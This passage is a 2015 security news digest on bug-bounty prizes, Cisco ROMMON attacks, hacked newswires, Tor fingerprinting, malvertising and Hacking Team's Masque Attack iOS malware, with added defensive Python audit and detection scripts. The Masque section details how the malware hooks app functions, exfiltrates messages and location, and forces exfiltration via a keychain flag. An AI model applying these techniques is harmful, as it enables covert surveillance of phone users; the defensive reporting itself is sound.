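    for k in map(str.strip, conf.get("kexalgorithms", "").split(",")):
        if k in RETIRED_KEX:
            findings.append(f"KexAlgorithms: {k} is disabled by default in 7.0")
    return findings


def _ssh_string(blob, off):
    (length,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + length], off + 4 + length


def rsa_pubkey_bits(key_line):
    """Modulus size of an 'ssh-rsa AAAA...' line. Wire format (RFC 4253):
    string "ssh-rsa", mpint e, mpint n."""
    blob = base64.b64decode(key_line.split()[1])
    kind, off = _ssh_string(blob, 0)
    if kind != b"ssh-rsa":
        raise ValueError(f"not an RSA key: {kind!r}")
    _e, off = _ssh_string(blob, off)
    n, _ = _ssh_string(blob, off)
    return int.from_bytes(n, "big").bit_length()


def make_rsa_pubkey_line(e, n):
    """Encode e and n in the same wire format. Used only to construct test input;
    n does not need to be a real RSA modulus to exercise the parser."""
    def mpint(x):
        size = (x.bit_length() + 8) // 8          # leading 0x00 when the high bit is set
        return struct.pack(">I", size) + x.to_bytes(size, "big")
    blob = struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode() + " constructed@example"


if __name__ == "__main__":
    for finding in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(finding)
    bits = rsa_pubkey_bits(make_rsa_pubkey_line(65537, 2**767 + 12345))
    print(f"synthetic key: {bits} bits, below floor: {bits < MIN_RSA_BITS}")
```

Run the audit against `sshd -T` output rather than the raw file where you can: a host with no Ciphers or MACs line is running the compiled-in defaults for its build, which the file does not show and which differ between releases. `ssh -Q cipher`, `ssh -Q mac` and `ssh -Q kex` list what the installed build supports.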
Facebook Awards $100,000 for New Class of Vulnerabilities and Detection Tool
13.8.2015
Facebook tonight awarded a $100,000 prize to a team of Georgia Tech researchers who found a new class of browser-based memory-corruption vulnerabilities and built a corresponding detection technique. The award brings the social media giant on par with Microsoft and its six-figure payouts for mitigation bypasses and for new defensive techniques against those bypasses. The award, Facebook's Internet Defense Prize, was handed out at the USENIX Security Symposium in Washington, D.C., and doubles last year's inaugural payout of $50,000. The prize is an effort to recognize and fund Internet security research in the areas of defense and protection, Facebook said.
“Security research in general celebrates offensive research and less attention is paid to people doing the nitty-gritty work required to keep systems safe and whole classes of vulnerabilities less likely to occur,” said Facebook security engineering manager Ioannis Papagiannis. “We look at work targeting meaningful bugs affecting a lot of people on the Internet.”
Georgia Tech Ph.D. students Byoungyoung Lee and Chengyu Song, and professors Taesoo Kim and Wenke Lee are this year's winners. Their paper, “Type Casting Verification: Stopping an Emerging Attack Vector,” explains a newly discovered class of C++ vulnerabilities and introduces CaVeR, a runtime bad-casting detection tool. “It performs program instrumentation at compile time and uses a new runtime type tracing mechanism—the type hierarchy table—to overcome the limitation of existing approaches and efficiently verify type casting dynamically,” the researchers wrote in describing CaVeR.
Papagiannis said Facebook hopes the reward money incentivizes the researchers to continue working on CaVeR and make it accessible and reusable on a greater scale. “They are targeting a real-world security problem that has been used to attack high-profile vulnerabilities,” he said, pointing to a 2013 Chrome type confusion exploit. “This addresses an important problem.”
Type casting, the researchers said, is important in enabling polymorphism in C++ programming in particular. “However, if not correctly used, it may return unsafe and incorrectly casted values, leading to so-called bad-casting or type-confusion vulnerabilities,” the researchers wrote. “Since a bad-casted pointer violates a programmer's intended pointer semantics and enables an attacker to corrupt memory, bad-casting has critical security implications similar to those of other memory corruption vulnerabilities. Despite the increasing number of bad-casting vulnerabilities, the bad-casting detection problem has not been addressed by the security community.”
Facebook's Papagiannis said in a statement that C++ supports static and dynamic casts, and that static casts are preferred for performance reasons because they skip the runtime check a dynamic cast performs. “People typically prefer to use static casts because they avoid that overhead, but if you cast to the wrong type using a static cast, the program may end up creating a pointer that can point past the memory allocated to a particular object,” Papagiannis said. “That pointer can then be used to corrupt the memory of the process.”
CaVeR has already paid dividends for the security community: with it, the researchers found two bad casts in Firefox and another nine in libstdc++, the GNU standard C++ library used in the Chrome browser; the vulnerabilities have since been patched.
Last year, Facebook paid $50,000 to Johannes Dahse and Thorsten Holz of Ruhr University in Bochum, Germany for their paper, “Static Detection of Second-Order Vulnerabilities in Web Applications.” Papagiannis said Facebook will meet Dahse and Holz a month from now in London to assess the progress they have made on their defensive tool and whether Facebook would consider using it internally. Papagiannis points out that Facebook makes no claims on any of the research and encourages teams to share their work with the greater community outside of academia.
Payouts of that size have been rare from reward programs. Microsoft's defense prize, known as the Blue Hat Prize, paid out $200,000 in the summer of 2012 to a Columbia University PhD candidate for his ROP mitigation technology. It has also paid six-figure prizes to researchers for mitigation bypasses, the most recent being a $125,000 award to HP's Zero Day Initiative team for new vulnerabilities that enable an ASLR bypass; Microsoft said it would not patch the bugs because they did not affect enough users, prompting HP in June to disclose full details and proof-of-concept code. The mitigation bypass bounty was launched in June 2013 and offers a $100,000 prize for exploit techniques that bypass Windows mitigations such as DEP, ASLR and SEHOP.
Cisco Warns Customers About Attacks Installing Malicious IOS Bootstrap Images
12.8.2015
Cisco is warning enterprise customers about a spike in attacks in which hackers use valid credentials on IOS devices to log in as administrators and then upload malicious ROMMON images to take control of the devices. The ROM Monitor is the program that initializes the hardware and software on IOS devices, and an attacker who is able to install a modified, malicious image has persistent access to the compromised device. Cisco's security team has been contacting customers to warn them about the attacks, which are ongoing.
A key point about the attacks is that the attacker needs valid administrator-level credentials to access the device. There is no underlying vulnerability being exploited; the attackers are somehow harvesting admin credentials and then using them to install the malicious ROMMON images.
“Cisco PSIRT has contacted customers to describe an evolution in attacks against Cisco IOS Classic platforms. Cisco has observed a limited number of cases where attackers, after gaining administrative or physical access to a Cisco IOS device, replaced the Cisco IOS ROMMON (IOS bootstrap) with a malicious ROMMON image,” the advisory from Cisco says. “In all cases seen by Cisco, attackers accessed the devices using valid administrative credentials and then used the ROMMON field upgrade process to install a malicious ROMMON. Once the malicious ROMMON was installed and the IOS device was rebooted, the attacker was able to manipulate device behavior. Utilizing a malicious ROMMON provides attackers an additional advantage because infection will persist through a reboot.”
The ability to install new ROMMON images on IOS devices is an expected capability for users with admin privileges. Cisco says there is no plan to issue a CVE for these attacks, because no vulnerability is involved.
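Because the attack Cisco describes rides the normal field-upgrade path rather than a bug, the detection signal is change rather than an indicator of compromise: the bootstrap version a device reports should match what change control says it should be. The following Python is an added example, not Cisco's tooling: the baseline and the `show version` excerpts are constructed (the line formats follow real IOS output), and collecting the output over SSH is left to whatever the operator already uses.

```python
import re

# Lines of 'show version' the check relies on; the samples below are constructed.
ROM_RE = re.compile(r"^ROM:\s*System Bootstrap, Version (\S+),", re.M)
UPTIME_RE = re.compile(r"^\S+ uptime is (.+)$", re.M)
IMAGE_RE = re.compile(r'^System image file is "([^"]+)"', re.M)

# Assumed baseline: the ROMMON version recorded for each device when it was
# commissioned, updated only through change control when an upgrade is scheduled.
BASELINE = {"edge-rtr-1": "15.0(1r)M15", "edge-rtr-2": "15.0(1r)M15"}

# Constructed excerpts. The second device shows a different bootstrap and a short
# uptime, the two traces a ROMMON swap plus the required reboot leave behind.
SHOW_VERSION = {
    "edge-rtr-1": """\
Cisco IOS Software, C2900 Software (C2900-UNIVERSALK9-M), Version 15.4(3)M3, RELEASE SOFTWARE (fc2)
ROM: System Bootstrap, Version 15.0(1r)M15, RELEASE SOFTWARE (fc1)
edge-rtr-1 uptime is 3 weeks, 2 days, 4 hours
System image file is "flash0:c2900-universalk9-mz.SPA.154-3.M3.bin"
""",
    "edge-rtr-2": """\
Cisco IOS Software, C2900 Software (C2900-UNIVERSALK9-M), Version 15.4(3)M3, RELEASE SOFTWARE (fc2)
ROM: System Bootstrap, Version 15.0(1r)M16, RELEASE SOFTWARE (fc1)
edge-rtr-2 uptime is 19 minutes
System image file is "flash0:c2900-universalk9-mz.SPA.154-3.M3.bin"
""",
}


def parse_show_version(text):
    """Pull the bootstrap version, uptime and running image out of 'show version'."""
    out = {}
    for name, rx in (("rommon", ROM_RE), ("uptime", UPTIME_RE), ("image", IMAGE_RE)):
        m = rx.search(text)
        out[name] = m.group(1) if m else None
    return out


def rommon_drift(baseline, outputs):
    """Compare each device's reported bootstrap against its baseline.
    Returns (device, message) pairs; an empty list means no crude change was seen."""
    findings = []
    for device, text in sorted(outputs.items()):
        info = parse_show_version(text)
        if info["rommon"] is None:
            findings.append((device, "no 'ROM: System Bootstrap' line; inspect manually"))
        elif device not in baseline:
            findings.append((device, f"no baseline recorded; observed ROMMON {info['rommon']}"))
        elif info["rommon"] != baseline[device]:
            findings.append((device, f"ROMMON {baseline[device]} -> {info['rommon']} "
                                     f"(uptime {info['uptime']}, image {info['image']})"))
    return findings


if __name__ == "__main__":
    for device, message in rommon_drift(BASELINE, SHOW_VERSION) or [("all", "ROMMON matches baseline")]:
        print(f"{device}: {message}")
```

Two caveats. A bootstrap written to deceive could report the old version string to the IOS running on top of it, so a clean comparison only rules out a careless swap; pair it with verification from the console at the next maintenance window. And since these attacks begin with valid administrator credentials, the upstream controls matter as much as the check: per-device credentials, AAA command accounting so that the field-upgrade command is logged off the box, and an alert when that command is issued outside a change window.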
Hack-Fueled ‘Unprecedented’ Insider Trading Ring Nets $100M
12.8.2015
Hackers based in Ukraine and Russia allegedly broke into servers belonging to several newswires and passed sensitive information on to an underground trading ring as part of what’s being referred to as an unprecedented new level of insider trading. Prosecutors claimed Tuesday that corporate information gleaned in the hacks was funneled to a sophisticated insider trading ring that earned those involved nearly $100 million. In a press conference Tuesday morning Mary Jo White, the Chairwoman of the U.S. Securities and Exchange Commission, maintained that given the number of hackers, traders, and profit involved, the case is “unprecedented.” Prosecutors with the U.S. Attorney’s office in New Jersey initially announced the indictment of nine people, five of whom were arrested in Georgia and Pennsylvania, Tuesday morning. A follow-up announcement in Newark revealed that 32 people connected to the scheme in total were facing charges. According to Reuters, it’s the first time that prosecutors have brought criminal charges against individuals for perpetrating a securities fraud scheme involving hacked insider information. The hackers purportedly infiltrated servers belonging to the press release agencies PRNewswire Association, Marketwire, and the Berkshire Hathaway subsidiary Business Wire, first accessing the newswires’ networks as early as 2010. Once they were in, over the course of five years, the hackers passed along sensitive information – some of which pertained to large Fortune 500 companies – to traders, who then used it to their benefit. A related SEC complaint filed in tandem with the indictments notes that civil charges are being brought against 32 individuals and claims the hackers used “malicious programming code and other deceptive techniques to hack into the computer systems.” According to a 57-page indictment filed in the U.S. District Court of New Jersey, five men were charged, including hackers Ivan Turchynov and Oleksandr Ieremenko, and traders Arkadiy Dubovoy, Igor Dubovoy, and Pavel Dubovoy. In a separate indictment filed in a New York federal court in Brooklyn, prosecutors charged four additional traders: Vitaly Korchevsky of Pennsylvania; Vladislav Khalupsky of Brooklyn and Odessa, Ukraine; and Leonid Momotok and Alexander Garkusha of Georgia. The traders used the information, which wasn’t yet public, to buy and sell shares. More than 150,000 press releases, some involving international, high-profile companies like Viacom, Netflix, Home Depot, Hewlett-Packard, Boeing, and Oracle, were shared amongst the group. Once the traders received press releases regarding companies, they did business quickly. “In order to execute their trades before the Stolen Releases were made public, the Trader Defendants and other co-conspirators sometimes executed trades in very short windows of time between when the Hacker Defendants illegally accessed and shared the Stolen Releases and when the press releases were disseminated to the public by Victim Newswires,” reads one part of the New Jersey-based indictment. According to the indictments, the hackers leveraged stolen credentials and used a series of reverse shells, brute force attacks, and SQL injection attacks to penetrate the agencies’ networks. The indictment filed in New Jersey initially claimed the conspiracy netted those involved over $30 million in “illicit trading profits,” but those figures were later upped to $100 million in a press conference Tuesday morning led by White and Homeland Security Secretary Jeh Johnson.
Certifi-Gate Android Vulnerability
10.8.2015
Android users are still busy dealing with the Stagefright vulnerability while the popular mobile operating system faces another critical security vulnerability, dubbed “Certifi-Gate”.
Millions of Android devices could be hacked by exploiting a plugin that manufacturers pre-install on Android devices.
Most Android device manufacturers pre-install a ‘Remote Support Tool (mRST)’ plugin, such as RSupport or TeamViewer, onto their phones to help support users.
But a critical security vulnerability, Certifi-Gate, in this mRST plugin allows malicious applications to gain illegitimate privileged access rights, even if your device is not rooted.
"Certifi-Gate" Android security vulnerability
According to Israeli researchers at Check Point, Ohad Bobrov and Avi Bashan, the Certifi-Gate Android vulnerability lies in the way Google’s partners (manufacturers) use certificates to sign remote support tools.
Remote support tools often have root-level access to Android devices, even if the device is not rooted. Thus any installed app can use the Certifi-Gate vulnerability to gain unrestricted device access, including:
screen scraping
keylogging
exfiltrating private information
installing malware apps, and more
The flaw affects thousands of millions of Android devices, and users cannot uninstall the vulnerable plugin from the device because it is part of the core system…
...Ironic, huh?
“An attacker can exploit mRATs to exfiltrate sensitive information from devices such as location, contacts, photos, screen capture, and even recordings of nearby sounds,” the researchers explained in their published paper.
“While analyzing and classifying mRATs, our research team found some apps share common traits with mRST. Known mRAT players include HackingTeam, mSpy, and SpyBubble.”
Shoring up Tor
10.8.2015
Researchers mount successful attacks against popular anonymity network — and show how to prevent them.
With 2.5 million daily users, the Tor network is the world’s most popular system for protecting Internet users’ anonymity. For more than a decade, people living under repressive regimes have used Tor to conceal their Web-browsing habits from electronic surveillance, and websites hosting content that’s been deemed subversive have used it to hide the locations of their servers.
Researchers at MIT and the Qatar Computing Research Institute (QCRI) have now demonstrated a vulnerability in Tor’s design. At the Usenix Security Symposium this summer, they will show that an adversary could infer a hidden server’s location, or the source of the information reaching a given Tor user, by analyzing the traffic patterns of encrypted data passing through a single computer in the all-volunteer Tor network.
Fortunately, the same paper also proposes defenses, which representatives of the Tor project say they are evaluating for possible inclusion in future versions of the Tor software.
“Anonymity is considered a big part of freedom of speech now,” says Albert Kwon, an MIT graduate student in electrical engineering and computer science and one of the paper’s first authors. “The Internet Engineering Task Force is trying to develop a human-rights standard for the Internet, and as part of their definition of freedom of expression, they include anonymity. If you’re fully anonymous, you can say what you want about an authoritarian government without facing persecution.”
Layer upon layer
Sitting atop the ordinary Internet, the Tor network consists of Internet-connected computers on which users have installed the Tor software. If a Tor user wants to, say, anonymously view the front page of The New York Times, his or her computer will wrap a Web request in several layers of encryption and send it to another Tor-enabled computer, which is selected at random. That computer — known as the guard — will peel off the first layer of encryption and forward the request to another randomly selected computer in the network. That computer peels off the next layer of encryption, and so on.
The last computer in the chain, called the exit, peels off the final layer of encryption, exposing the request’s true destination: the Times. The guard knows the Internet address of the sender, and the exit knows the Internet address of the destination site, but no computer in the chain knows both. This routing scheme, with its successive layers of encryption, is known as onion routing, and it gives the network its name: “Tor” is an acronym for “the onion router.”
In addition to anonymous Internet browsing, however, Tor also offers what it calls hidden services. A hidden service protects the anonymity of not just the browser, but the destination site, too. Say, for instance, that someone in Iran wishes to host a site archiving news reports from Western media but doesn’t want it on the public Internet. Using the Tor software, the host’s computer identifies Tor routers that it will use as “introduction points” for anyone wishing to access its content. It broadcasts the addresses of those introduction points to the network, without revealing its own location.
If another Tor user wants to browse the hidden site, both his or her computer and the host’s computer build Tor-secured links to the introduction point, creating what the Tor project calls a “circuit.” Using the circuit, the browser and host identify yet another router in the Tor network, known as a rendezvous point, and build a second circuit through it. The location of the rendezvous point, unlike that of the introduction point, is kept private.
Traffic fingerprinting
Kwon devised an attack on this system with joint first author Mashael AlSabah, an assistant professor of computer science at Qatar University, a researcher at QCRI, and, this year, a visiting scientist at MIT; Srini Devadas, the Edwin Sibley Webster Professor in MIT’s Department of Electrical Engineering and Computer Science; David Lazar, another graduate student in electrical engineering and computer science; and QCRI’s Marc Dacier.
The researchers’ attack requires that the adversary’s computer serve as the guard on a Tor circuit. Since guards are selected at random, if an adversary connects enough computers to the Tor network, the odds are high that, at least on some occasions, one or another of them would be well-positioned to snoop.
During the establishment of a circuit, computers on the Tor network have to pass a lot of data back and forth. The researchers showed that simply by looking for patterns in the number of packets passing in each direction through a guard, machine-learning algorithms could, with 99 percent accuracy, determine whether the circuit was an ordinary Web-browsing circuit, an introduction-point circuit, or a rendezvous-point circuit. Breaking Tor’s encryption wasn’t necessary.
Furthermore, by using a Tor-enabled computer to connect to a range of different hidden services, they showed that a similar analysis of traffic patterns could identify those services with 88 percent accuracy. That means that an adversary who lucked into the position of guard for a computer hosting a hidden service, could, with 88 percent certainty, identify it as the service’s host.
Similarly, a spy who lucked into the position of guard for a user could, with 88 percent accuracy, tell which sites the user was accessing.
To defend against this type of attack, “We recommend that they mask the sequences so that all the sequences look the same,” AlSabah says. “You send dummy packets to make all five types of circuits look similar.”
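The padding idea AlSabah describes, worked through on constructed data as an added example (not the paper's code or dataset): a guard that sees only cell counts and directions can tell three constructed circuit types apart, and inserting dummy cells so every circuit presents one canonical direction sequence removes that signal. The trace shapes, the feature function and the 16-cell template are all assumptions made for illustration.

```python
from collections import Counter

# Constructed cell-direction traces of circuit establishment as a guard would
# see them: -1 = cell from client toward the network, +1 = cell back toward the
# client. The shapes are invented for illustration, not measured Tor traffic.
CONSTRUCTED_TRACES = {
    "general": [-1, +1, -1, +1, -1, +1],
    "introduction": [-1, +1, -1, +1, -1, +1, -1, -1, +1, -1],
    "rendezvous": [-1, +1, -1, +1, -1, +1, +1, -1, +1, -1, +1, -1],
}

# Canonical shape every padded circuit should present: 16 alternating cells.
TEMPLATE = [-1, +1] * 8


def fingerprint(trace):
    """Features in the spirit of the paper: a guard that cannot decrypt
    anything still sees how many cells flow each way and in what order."""
    counts = Counter(trace)
    return (len(trace), counts[-1], counts[+1], tuple(trace[:8]))


def distinct_fingerprints(traces):
    """Number of circuit types an observer can tell apart via `fingerprint`."""
    return len({fingerprint(t) for t in traces})


def pad_to_template(trace, template):
    """Greedily embed the real cells into the template, emitting a dummy cell
    wherever the template's next direction does not match the next real cell.
    Returns [(direction, is_dummy)]. Succeeds iff the real trace is a
    subsequence of the template; otherwise the template is too short."""
    padded, i = [], 0
    for direction in template:
        if i < len(trace) and trace[i] == direction:
            padded.append((direction, False))
            i += 1
        else:
            padded.append((direction, True))
    if i != len(trace):
        raise ValueError("template cannot cover trace; use a longer template")
    return padded


def observed(padded):
    """What the guard sees: directions only, dummies are indistinguishable."""
    return [direction for direction, _ in padded]


def dummy_count(padded):
    """Bandwidth overhead of the defense for one circuit."""
    return sum(1 for _, is_dummy in padded if is_dummy)


if __name__ == "__main__":
    print("before padding, distinguishable types:",
          distinct_fingerprints(CONSTRUCTED_TRACES.values()))
    padded = {k: pad_to_template(t, TEMPLATE) for k, t in CONSTRUCTED_TRACES.items()}
    print("after padding, distinguishable types:",
          distinct_fingerprints(observed(p) for p in padded.values()))
    for k, p in padded.items():
        print(f"{k}: {dummy_count(p)} dummy cells of {len(p)}")
```

The greedy embedding shows the trade-off Goulet alludes to: the template must be a supersequence of every real trace, and the shorter circuit types pay for that with more dummy cells.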
“For a while, we’ve been aware that circuit fingerprinting is a big issue for hidden services,” says David Goulet, a developer with the Tor project. “This paper showed that it’s possible to do it passively — but it still requires an attacker to have a foot in the network and to gather data for a certain period of time.”
“We are considering their countermeasures as a potential improvement to the hidden service,” he adds. “But I think we need more concrete proof that it definitely fixes the issue.”
Malvertisers abused Yahoo’s ad network for days
8.8.2015
A large-scale malvertising attack abusing Yahoo’s ad network has been hitting visitors of the Internet giant's many popular and heavy-traffic sites for nearly a week.
Started on July 28th, the campaign showed malicious ads that redirected visitors to a site hosting the Angler exploit kit, which then attempted to exploit an Adobe Flash vulnerability on the victims' computers.
The attack was spotted by Malwarebytes' researchers, who immediately notified Yahoo, and the company put a stop to it.
"As soon as we learned of this issue, our team took action and will continue to investigate this issue," Yahoo noted.
"Unfortunately, disruptive ad behavior affects the entire tech industry. Yahoo has a long history of engagement on this issue and is committed to working with our peers to create a secure advertising experience. We’ll continue to ensure the quality and safety of our ads through our automated testing and through the SafeFrame working group, which seeks to protect consumers and publishers from the potential security risks inherent in the online ad ecosystem.”
Malwarebytes' researchers didn't manage to get the ultimate malicious payload delivered by the exploit kit, but Angler has lately been dropping a mix of ad fraud malware and ransomware. It's also unknown how many users have been victimized.
“This one is a doozey in terms of scale, because it uses Yahoo's properties, which see nearly 7 billion visits per month," commented Kowsik Guruswamy, CTO for Menlo Security.
"The method of the attack is nothing new: Bad actors place ads via Yahoo's network, and the ads direct users to sites that have been compromised and set up to serve malware."
This particular campaign has been stopped by Yahoo, but if you are still running Flash on your system, you should make sure to update it regularly. And if you have been lax in doing that, checking your computer for malware is a good idea.
"The inconvenient truth about the Web is that it's dangerous and it's not the kind of place you should go without effective protection. There's no way to stop cyber criminals from attacking, and there's no way to detect and stop all of their attacks. The only way to be safe is to execute *all* Web content away from your endpoint so it can't do harm even if it's malicious. That's what isolation security is all about, and it seems pretty clear that its time has come,” noted Guruswamy.
"The complexity of the online advertising economy makes it easy for malicious actors to abuse the system and get away with it. It is one of the reasons why we need to work very closely with different industry partners to detect suspicious patterns and react very quickly to halt rogue campaigns," added Malwarebytes' Jerome Segura.
Malicious advertisements surge! 260% spike in 2015
8.8.2015
RiskIQ announced at Black Hat USA 2015 its latest findings on the prevalence of malvertising across the nearly two billion publisher pages and 10 million mobile apps it monitors per day.
In the first half of this year the number of malvertisements has jumped 260 percent compared to the same period in 2014. The number of unique malvertisements has climbed 60 percent year over year. Meanwhile, fake Flash updates have replaced fake antivirus and fake Java updates as the most common method used to lure victims into installing various forms of malware, including ransomware, spyware and adware.
“The major increase we have seen in the number of malvertisements over the past 48 months confirms that digital ads have become the preferred method for distributing malware,” said James Pleger, Director of Research at RiskIQ. “There are a number of reasons for this development, including the fact that malvertisements are difficult to detect and take down since they are delivered through ad networks and are not resident on websites. They also allow attackers to exploit the powerful profiling capabilities of these networks to precisely target specific populations of users.”
The rise of programmatic advertising, which relies on software instead of humans to purchase digital ads, has generated unprecedented growth and introduced sophisticated targeting into digital ad networks.
This machine-to-machine ecosystem has also created opportunities for cyber criminals to exploit display advertising to distribute malware. For example, malicious code can be hidden within an ad, executables can be embedded on a webpage, or bundled within software downloads.
RiskIQ’s global proxy network of virtual software users scans billions of websites and millions of mobile apps per day for the presence of malvertisements, malware and malicious/copycat apps.
The company’s most recent research into the prevalence of malvertisements yielded the following findings:
Malvertisements have increased 260 percent on a pro-rated basis in the first half of 2015 (450,000) compared to all of 2014 (250,000).
The number of unique malvertisements in June 2015 (80,000) has jumped 60 percent compared to the same period last year (50,000).
The most common lure used in malvertisements in 2015 has been fake Flash updates; in 2014 the top lures were fake antivirus updates and fake Java updates.
In 2014, there was significantly more exploit kit activity (which silently installs malware without end-user intervention) than fake software updates, which require user consent.
In 2015, fake software updates have surpassed exploit kits as the most common technique for installing malware.
iOS Masque Attack Weaponized: A Real World Look
7.8.2015
We have previously described the threats of Masque Attacks against iOS in a series of blogs [2,3,4]. Up until now, these attacks had never been seen carried out in the wild, highlighting that advanced threats were not utilizing mobile to carry out their attacks despite rapid user adoption. However, FireEye has recently uncovered 11 iOS apps within the Hacking Team’s arsenal that utilize Masque Attacks, marking the first instance of targeted iOS malware being used against non-jailbroken iOS devices.
These apps are reverse-engineered and weaponized versions of popular social networking and messaging apps, including: WhatsApp, Twitter, Facebook, Facebook Messenger, WeChat, Google Chrome, Viber, BlackBerry Messenger, Skype, Telegram, and VK. Unlike the normal versions of these apps, they come with an extra binary designed to exfiltrate sensitive data and communicate with a remote server. Because all the bundle identifiers are the same as those of the genuine apps on the App Store, they can directly replace the genuine apps on iOS devices prior to 8.1.3.
Note that the bundle identifiers are actually configurable by the remote attackers. So for iOS devices above 8.1.3, although the Masque Attack vulnerability has been fixed (apps with the same bundle identifiers cannot replace each other), the attackers can still use a unique bundle identifier to deploy the weaponized app. In this scheme, the attack falls back to the Enpublic attack[1].
Fig. 5 shows an example of the runtime behavior of the repackaged Facebook app. Upon launching the app, three consecutive alerts pop up asking for permission to access Photos, the Microphone, and Contacts.
As shown in Fig. 6, these malicious Masque Attack apps leverage the LC_LOAD_DYLIB command of the Mach-O format to inject a malicious dylib (named “_PkgSign”) into the genuine executable file. This dylib implements the core malicious logic.
Since each Masque Attack app has different internals, the dylib needs to hook different methods for data exfiltration. As listed in Table 1, the malicious dylib maps each Masque Attack app to an ID prefixed with “TIGI000” and a customized class for managing the malicious behaviors controlled by the remote server.
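A defender's triage check for the injection technique described above, written as an added example (not FireEye's tooling): parse the 64-bit Mach-O header and load commands, list every LC_LOAD_DYLIB / LC_LOAD_WEAK_DYLIB entry, and report dylibs outside the usual system prefixes. The Mach-O blob is constructed in memory so the script runs offline, and the path `@executable_path/_PkgSign` is a hypothetical stand-in for the injected library.

```python
import struct

MH_MAGIC_64 = 0xFEEDFACF
LC_LOAD_DYLIB = 0x0C
LC_LOAD_WEAK_DYLIB = 0x80000018
HEADER_64 = struct.Struct("<IiiIIIII")  # mach_header_64: 8 fields, 32 bytes
LOAD_CMD = struct.Struct("<II")         # cmd, cmdsize
DYLIB_CMD = struct.Struct("<IIIIII")    # cmd, cmdsize, name off, ts, cur, compat
TRUSTED_PREFIXES = ("/usr/lib/", "/System/Library/")
KNOWN_BAD_NAMES = ("_PkgSign",)         # name reported in the FireEye write-up


def build_dylib_cmd(name, cmd=LC_LOAD_DYLIB):
    """Encode one dylib_command plus its NUL-terminated name, 8-byte aligned."""
    raw = name.encode() + b"\0"
    pad = (-(DYLIB_CMD.size + len(raw))) % 8
    size = DYLIB_CMD.size + len(raw) + pad
    return DYLIB_CMD.pack(cmd, size, DYLIB_CMD.size, 2, 0x10000, 0x10000) + raw + b"\0" * pad


def build_macho(dylibs):
    """Constructed minimal ARM64 MH_EXECUTE image holding only dylib commands."""
    cmds = b"".join(build_dylib_cmd(n) for n in dylibs)
    hdr = HEADER_64.pack(MH_MAGIC_64, 0x0100000C, 0, 2, len(dylibs), len(cmds), 0, 0)
    return hdr + cmds


def load_dylibs(data):
    """Return the dylib paths named by LC_LOAD_DYLIB/LC_LOAD_WEAK_DYLIB, in order.
    Handles thin 64-bit little-endian images only; fat binaries need slicing."""
    if len(data) < HEADER_64.size:
        raise ValueError("too short for a Mach-O header")
    magic, _, _, _, ncmds, sizeofcmds, _, _ = HEADER_64.unpack_from(data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a thin 64-bit little-endian Mach-O")
    names, off, end = [], HEADER_64.size, HEADER_64.size + sizeofcmds
    for _ in range(ncmds):
        if off + LOAD_CMD.size > end:
            raise ValueError("load commands overrun sizeofcmds")
        cmd, cmdsize = LOAD_CMD.unpack_from(data, off)
        if cmdsize < LOAD_CMD.size or off + cmdsize > end:
            raise ValueError("bad cmdsize")
        if cmd in (LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB):
            name_off = struct.unpack_from("<I", data, off + 8)[0]
            raw = data[off + name_off:off + cmdsize]
            names.append(raw.split(b"\0", 1)[0].decode("utf-8", "replace"))
        off += cmdsize
    return names


def suspicious_dylibs(names):
    """Dylibs not under a trusted system prefix. Legitimate apps also embed
    @rpath frameworks, so treat this as a review list, not a verdict."""
    return [n for n in names if not n.startswith(TRUSTED_PREFIXES)]


def is_known_bad(name):
    """True when the dylib's basename matches a name tied to this campaign."""
    return name.rsplit("/", 1)[-1] in KNOWN_BAD_NAMES


if __name__ == "__main__":
    sample = build_macho(["/usr/lib/libSystem.B.dylib",
                          "/System/Library/Frameworks/UIKit.framework/UIKit",
                          "@executable_path/_PkgSign"])   # constructed
    for name in suspicious_dylibs(load_dylibs(sample)):
        print(("KNOWN BAD " if is_known_bad(name) else "review ") + name)
```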
| APPID | Malicious Manager Class Name | Bundle ID of Masque Attack App |
| --- | --- | --- |
| TIGI00001 | POViewConnection | com.skype.skype |
| TIGI00002 | POViewAsynService | com.viber |
| TIGI00003 | POViewRegistration | net.whatsapp.WhatsApp |
| TIGI00004 | _bvbcccyytr | com.facebook.Facebook |
| TIGI00006 | POViewDataManager | com.facebook.Messenger |
| TIGI00008 | POViewLogger | com.google.chrome.ios |
| TIGI00009 | VKMessageManager | com.vk.vkclient |
| TIGI00010 | TelegramManager | ph.telegra.Telegraph |
| TIGI00011 | BBMManager | com.blackberry.bbm1 |
| TIGI00012 | WechatManager | com.tencent.xin |
| TIGI00013 | TwitterManager | com.atebits.Tweetie2 |
| ... | ... | ... |
Table 1: The mapping of handler class to the bundle id of each Masque Attack app
The injected dylib hooks 52 sensitive functions of 38 classes in the genuine executables. All of the hooked class methods correspond to key functionalities of the genuine apps. For example, it hooks “[SKPConversation OnMessage:andMessageobjectid:]” to intercept messages in WhatsApp and “[VideoVoipCallerView OnBeginTalk:]” to start recording an outgoing voice call in WeChat.
The injected dylib acts as part of the app’s executable and can read and modify all data in the app’s containers to gather sensitive information and send it to the remote server. The information includes:
Voice call recording in Skype, Wechat, etc.
Text message intercepting in Skype, Whats App, Facebook messenger, etc.
Chrome visited website history
Phone call
SMS/iMessage content
Precise GPS coordinate recording in background
Contacts information
Photos
Of special note, the dylib uploads data only from targeted users. It sends the device’s IMEI to the remote server, which decides whether the device is of interest and instructs the dylib whether or not to exfiltrate data. However, we found logic that bypasses this check if the SKIP-LICENSE key in the keychain is set to 1, so a local accomplice can set this value to force exfiltration if they consider the victim valuable.
Finally, all data are reassembled in JSON format and sent to the remote server. Fig. 8 shows an example of the uploaded data (actual values anonymized). The items field contains different types of data such as the chat data for the communication apps, geolocation information, phone call history, etc.
Configurable via URL scheme
The remote server and the malicious behaviors are configurable through a URL scheme. In each repackaged sample, a customized URL scheme is added to the Info.plist file. The URL schemes follow the pattern “TIGI0000X://”, which is exactly the APPID listed in Table 1.
By hooking the “application:openURL:sourceApplication:annotation:” method, the malicious dylib parses the configuration data when the URL scheme is opened. The configuration data is serialized as JSON, encoded in Base64 and appended right after the customized URL scheme. The attacker can lure targeted victims into clicking such URLs via SMS, email or a web page on the device, and thereby customize target-specific settings such as the remote server.
Conclusion
From the attack tools leaked from the Hacking Team, we have now seen that advanced targeted attacks against iOS devices have begun to emerge. We encourage all iOS users to always update their devices to the latest version of iOS and to pay close attention to the sources from which they download their apps.
References
[1] VB2014 paper: Apple without a shell – iOS under targeted attack
